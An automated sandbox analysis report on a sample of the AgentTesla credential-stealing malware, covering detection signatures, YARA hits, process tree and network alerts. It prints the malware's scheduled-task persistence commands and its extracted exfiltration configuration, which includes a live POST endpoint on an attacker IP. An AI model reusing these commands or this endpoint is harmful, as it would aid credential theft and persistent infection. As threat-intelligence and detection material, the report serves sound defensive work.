Windows Analysis Report
pdP5Rv9pPW.exe

Overview

General Information

Sample Name: pdP5Rv9pPW.exe
Analysis ID: 691823
MD5: 18e913ec810a1131c23d6fea7526c4f8
SHA1: 96c426169c87505e950898ad38913cc726bf198d
SHA256: 548a9d790d8d54baf1faf9c67133398a96fad5add7daa35e89aad9d777bd103d
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Injects files into Windows application
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Binary or sample is protected by dotNetProtector
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
PE file contains executable resources (Code or Archives)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • pdP5Rv9pPW.exe (PID: 5704 cmdline: "C:\Users\user\Desktop\pdP5Rv9pPW.exe" MD5: 18E913EC810A1131C23D6FEA7526C4F8)
    • vbc.exe (PID: 5224 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
    • cmd.exe (PID: 5020 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5076 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6128 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 4980 cmdline: cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • excel.exe (PID: 3980 cmdline: "C:\Users\user\AppData\Roaming\excel\excel.exe" MD5: B3A917344F5610BEEC562556F11300FA)
    • conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • excel.exe (PID: 992 cmdline: "C:\Users\user\AppData\Roaming\excel\excel.exe" MD5: B3A917344F5610BEEC562556F11300FA)
    • conhost.exe (PID: 5728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • fghn.exe (PID: 5836 cmdline: C:\Users\user\AppData\Roaming\fghn\fghn.exe MD5: 18E913EC810A1131C23D6FEA7526C4F8)
    • vbc.exe (PID: 1608 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
    • cmd.exe (PID: 5436 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 3372 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5332 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 4888 cmdline: cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://141.98.6.75/weption/inc/0986372054b5f8.php"}
Source | Rule | Description | Author | Strings
00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
  • 0x30055:$a13: get_DnsResolver
  • 0x2e849:$a20: get_LastAccessed
  • 0x309e9:$a27: set_InternalServerPort
  • 0x30d02:$a30: set_GuidMasterKey
  • 0x2e950:$a33: get_Clipboard
  • 0x2e95e:$a34: get_Keyboard
  • 0x2fc88:$a35: get_ShiftKeyDown
  • 0x2fc99:$a36: get_AltKeyDown
  • 0x2e96b:$a37: get_Password
  • 0x2f40a:$a38: get_PasswordHash
  • 0x3046b:$a39: get_DefaultCredentials
00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
Source | Rule | Description | Author | Strings
0.2.pdP5Rv9pPW.exe.3996170.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
2.0.vbc.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
2.0.vbc.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.pdP5Rv9pPW.exe.3996170.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
2.0.vbc.exe.400000.0.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
  • 0x32b1b:$s10: logins
  • 0x32582:$s11: credential
  • 0x2eb50:$g1: get_Clipboard
  • 0x2eb5e:$g2: get_Keyboard
  • 0x2eb6b:$g3: get_Password
  • 0x2fe78:$g4: get_CtrlKeyDown
  • 0x2fe88:$g5: get_ShiftKeyDown
  • 0x2fe99:$g6: get_AltKeyDown

No Sigma rule has matched
Timestamp: 08/28/22-17:19:41.645966
Source IP: 192.168.2.4
Destination IP: 141.98.6.75
Source Port: 49717
Destination Port: 80
Protocol: TCP
SID: 2034579
Classtype: A Network Trojan was detected

Timestamp: 08/28/22-17:21:11.426704
Source IP: 192.168.2.4
Destination IP: 141.98.6.75
Source Port: 49753
Destination Port: 80
Protocol: TCP
SID: 2034579
Classtype: A Network Trojan was detected

AV Detection

Source: pdP5Rv9pPW.exe | Virustotal: Detection: 66%
Source: pdP5Rv9pPW.exe | ReversingLabs: Detection: 51%
Source: http://141.98.6.75/weption/inc/0986372054b5f8.php | Avira URL Cloud: Label: phishing
Source: http://141.98.6.75 | Virustotal: Detection: 5%
Source: http://141.98.6.75/weption/inc/0986372054b5f8.php | Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | ReversingLabs: Detection: 51%
Source: pdP5Rv9pPW.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Joe Sandbox ML: detected
Source: 2.0.vbc.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://141.98.6.75/weption/inc/0986372054b5f8.php"}
Source: pdP5Rv9pPW.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: pdP5Rv9pPW.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vbc.pdb | source: vbc.exe, 00000002.00000003.370543337.000000000A09D000.00000004.00000800.00020000.00000000.sdmp, excel.exe, 0000000C.00000000.391226032.0000000001261000.00000020.00000001.01000000.00000007.sdmp, excel.exe.2.dr

Software Vulnerabilities

Source: C:\Users\user\AppData\Roaming\excel\excel.exe | Process created: C:\Windows\System32\conhost.exe

Networking

Source: Traffic | Snort IDS: 2034579 ET TROJAN AgentTesla Communicating with CnC Server 192.168.2.4:49717 -> 141.98.6.75:80
Source: Traffic | Snort IDS: 2034579 ET TROJAN AgentTesla Communicating with CnC Server 192.168.2.4:49753 -> 141.98.6.75:80
Source: Joe Sandbox View | ASN Name: CMCSUS CMCSUS
Source: global traffic | HTTP traffic detected: POST /weption/inc/0986372054b5f8.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0; Content-Type: application/x-www-form-urlencoded; Host: 141.98.6.75; Content-Length: 580; Expect: 100-continue; Connection: Keep-Alive (2 identical entries)
Source: unknown | TCP traffic detected without corresponding DNS query: 141.98.6.75 (13 identical entries)
Source: vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://141.98.6.75
Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://141.98.6.75/weption/inc/0986372054b5f8.php
Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://141.98.6.75/weption/inc/0986372054b5f8.php127.0.0.1POST
Source: vbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://141.98.6.75/weption/inc/0986372054b5f8.phpa
Source: vbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://141.98.6.75/weption/inc/0986372054b5f8.phpa(
Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://141.98.6.754
Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: vbc.exe, 00000017.00000002.590068919.00000000075B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://X7rzdy8x3IrJP.net
Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ZWXWPK.com
Source: excel.exe, 0000000C.00000002.397005792.00000000006FA000.00000004.00000010.00020000.00000000.sdmp, excel.exe, 00000010.00000002.413724237.00000000004FA000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft
Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org%
Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org%appdata
Source: vbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://di.98.6.75/weption/inc/0986372054b5f8.php
Source: vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | HTTP traffic detected: POST /weption/inc/0986372054b5f8.php HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0; Content-Type: application/x-www-form-urlencoded; Host: 141.98.6.75; Content-Length: 580; Expect: 100-continue; Connection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: pdP5Rv9pPW.exe PID: 5704, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 2.0.vbc.exe.400000.0.unpack, <PrivateImplementationDetails>{347C8262-2EBE-4E96-94BF-A26D5CC8C515}/8F8FDB3B-6BBB-4200-AC0A-6D05451697D6.cs | Large array initialization: .cctor: array initializer size 11651
Source: pdP5Rv9pPW.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: pdP5Rv9pPW.exe PID: 5704, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: String function: 09EE5A68 appears 54 times
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_00D5F968 CreateProcessAsUserA
Source: excel.exe.2.dr | Static PE information: Resource name: RT_STRING type: VAX-order2 68k Blit mpx/mux executable
Source: pdP5Rv9pPW.exe, 00000000.00000002.375077653.00000000029E3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamerattSBVyJzEUoMgBuAZJkkSZn.exe4 vs pdP5Rv9pPW.exe
Source: pdP5Rv9pPW.exe, 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamerattSBVyJzEUoMgBuAZJkkSZn.exe4 vs pdP5Rv9pPW.exe
Source: pdP5Rv9pPW.exe, 00000000.00000000.301105429.0000000000206000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameAvLaunch.exeB vs pdP5Rv9pPW.exe
Source: pdP5Rv9pPW.exe | Binary or memory string: OriginalFilenameAvLaunch.exeB vs pdP5Rv9pPW.exe
Source: pdP5Rv9pPW.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (2 identical entries)
Source: fghn.exe.9.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (2 identical entries)
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\excel\excel.exe 7BA4838E3356B69254730E891ADD84092E3143016A515FF3E990CE19874A2459
Source: pdP5Rv9pPW.exe | Virustotal: Detection: 66%
Source: pdP5Rv9pPW.exe | ReversingLabs: Detection: 51%
Source: pdP5Rv9pPW.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\pdP5Rv9pPW.exe "C:\Users\user\Desktop\pdP5Rv9pPW.exe"
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\excel\excel.exe "C:\Users\user\AppData\Roaming\excel\excel.exe"
                  Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\excel\excel.exe "C:\Users\user\AppData\Roaming\excel\excel.exe"
                  Source: C:\Users\user\AppData\Roaming\excel\excel.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\fghn\fghn.exe C:\Users\user\AppData\Roaming\fghn\fghn.exe
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
